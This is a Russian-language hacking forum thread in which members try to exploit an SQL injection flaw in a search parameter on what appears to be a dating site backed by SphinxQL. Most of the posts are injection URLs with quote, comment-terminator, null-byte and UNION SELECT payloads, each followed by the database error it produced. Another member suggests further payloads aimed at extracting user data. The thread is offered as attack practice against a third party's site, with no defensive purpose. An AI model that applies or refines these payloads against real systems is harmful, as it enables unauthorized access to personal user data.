Старый 20.09.2016, 04:30   #1
YuNi|[c
 
Аватар для YuNi|[c
 
Регистрация: 03.01.2011
Сообщений: 82
Репутация: 0
Exclamation Скул на SphinXQL

привет народ.
Нашел интересный скул если можно назвать таковым.
Там ошибка от SphinXQL.
Пробовал крутит со всеми методами и для всех СУБД но помогло.
Гуглил но тоже ничего не помогло. Мб кто сталкивался с этой конструцией запросов?

привер таков:
Код:
xttp://site.com/search?a[ageFrom]=18'&a[ageTo]=90&param1=value1.....paramN=value=N
Код:
Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected $undefined, expecting $end near '' AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18' AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;
Код:
xttp://site.com/search?a[ageFrom]=18''&a[ageTo]=90&param1=value1.....paramN=value=N
Код:
Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected QUOTED_STRING, expecting $end near ''' AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18'' AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;
раньше тоже встречал один и тогда просто забил на него

Прошу совета
YuNi|[c вне форума   Ответить с цитированием
Старый 20.09.2016, 16:56   #2
profexer
 
Регистрация: 06.01.2011
Сообщений: 117
Репутация: 63
По умолчанию

Незакрытый комментарий вызывает ошибку?
profexer вне форума   Ответить с цитированием
Старый 20.09.2016, 19:55   #3
YuNi|[c
 
Аватар для YuNi|[c
 
Регистрация: 03.01.2011
Сообщений: 82
Репутация: 0
По умолчанию

Цитата:
Сообщение от profexer Посмотреть сообщение
Незакрытый комментарий вызывает ошибку?
на /* идет без ошибки и на ;%00 тоже
вот на OR или AND реагирует по разному:
Код:
xttp://site.com/search?a[ageFrom]=18 or 1=1/*&a[ageTo]=90&param1=value1.....paramN=value=N
Код:
Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected OR, expecting $end near 'or 1=1/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 or 1=1/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;
Код:
xttp://site.com/search?a[ageFrom]=18 and 1=1/*&a[ageTo]=90&param1=value1.....paramN=value=N
Код:
Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected CONST_INT, expecting IDENT (or 97 other tokens) near '1=1/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 and 1=1/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;
Код:
xttp://site.com/search?a[ageFrom]=18' and 456='456;%00&a[ageTo]=90&param1=value1.....paramN=value=N
Код:
Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected QUOTED_STRING, expecting $end near '' and 456='456;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18' and 456='456; AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;
YuNi|[c вне форума   Ответить с цитированием
Старый 20.09.2016, 21:07   #4
profexer
 
Регистрация: 06.01.2011
Сообщений: 117
Репутация: 63
По умолчанию

Там не нужна кавычка, зачем ты ее туда постоянно суешь?
Если незакрытый комментарий проходит, то просто правильно закончи запрос
Цитата:
18 AND id_user=-1 UNION SELECT 1, 2/*
profexer вне форума   Ответить с цитированием
Старый 21.09.2016, 00:46   #5
YuNi|[c
 
Аватар для YuNi|[c
 
Регистрация: 03.01.2011
Сообщений: 82
Репутация: 0
По умолчанию

Цитата:
Сообщение от profexer Посмотреть сообщение
Там не нужна кавычка, зачем ты ее туда постоянно суешь?
Если незакрытый комментарий проходит, то просто правильно закончи запрос
Код:
a[ageFrom]=18 AND id_user=-1 UNION SELECT 1,2/*
Код:
Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected IDENT, expecting $end near 'UNION SELECT 1,2/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 AND id_user=-1 UNION SELECT 1,2/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;
Код:
a[ageFrom]=18 AND id_user=-1 UNION SELECT 1,2;%00
Код:
Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected IDENT, expecting $end near 'UNION SELECT 1,2/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 AND id_user=-1 UNION SELECT 1,2/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;

смог limit изменит, выводит 2 результата анкет:
Код:
a[ageFrom]=18 AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 10,2/*
Но это не то. Нельзя выводит нужные данные. Только без ошибки но с меньшим лимитом

Последний раз редактировалось YuNi|[c; 21.09.2016 в 00:49..
YuNi|[c вне форума   Ответить с цитированием
Старый 21.09.2016, 01:14   #6
profexer
 
Регистрация: 06.01.2011
Сообщений: 117
Репутация: 63
По умолчанию

Я не знаком с SphinXQL, так что будем тыкать пальцем.
Попробуй так:
Цитата:
18 AND is_online=-1 UNION SELECT 1, 2 LIMIT 0,1/*
Цитата:
18 AND `id_user`=-1 UNION SELECT 1, 2 LIMIT 0,1/*
Цитата:
18 AND `id_user`=-1 UNION SELECT `1` as id_user, `2` as is_online LIMIT 0,1/*

Последний раз редактировалось profexer; 21.09.2016 в 01:19..
profexer вне форума   Ответить с цитированием
Старый 21.09.2016, 01:26   #7
YuNi|[c
 
Аватар для YuNi|[c
 
Регистрация: 03.01.2011
Сообщений: 82
Репутация: 0
По умолчанию

ладно забейте, думаю Sphinxql не крутится спасибо profexer

Последний раз редактировалось YuNi|[c; 21.09.2016 в 02:09..
YuNi|[c вне форума   Ответить с цитированием
Старый 21.09.2016, 02:11   #8
profexer
 
Регистрация: 06.01.2011
Сообщений: 117
Репутация: 63
По умолчанию

Ну почему же не крутиться? Думаю очень даже крутиться, просто нужно реально разобраться как.
profexer вне форума   Ответить с цитированием
Старый 21.09.2016, 02:26   #9
YuNi|[c
 
Аватар для YuNi|[c
 
Регистрация: 03.01.2011
Сообщений: 82
Репутация: 0
По умолчанию

Цитата:
Сообщение от profexer Посмотреть сообщение
Ну почему же не крутиться? Думаю очень даже крутиться, просто нужно реально разобраться как.
ответы с разными вариантами постил, уже незнаю что пробовать дальше.
сфинкс просто игнорит мои добавленные запросы.
YuNi|[c вне форума   Ответить с цитированием
Старый 21.09.2016, 02:30   #10
profexer
 
Регистрация: 06.01.2011
Сообщений: 117
Репутация: 63
По умолчанию

Может он вовсе и не игнорит? Если нет ошибки, то где-то же выводится id пользователя (в ссылке или например его имя, по которому можно получить id) или наоборот вся инфа пропадает.
profexer вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot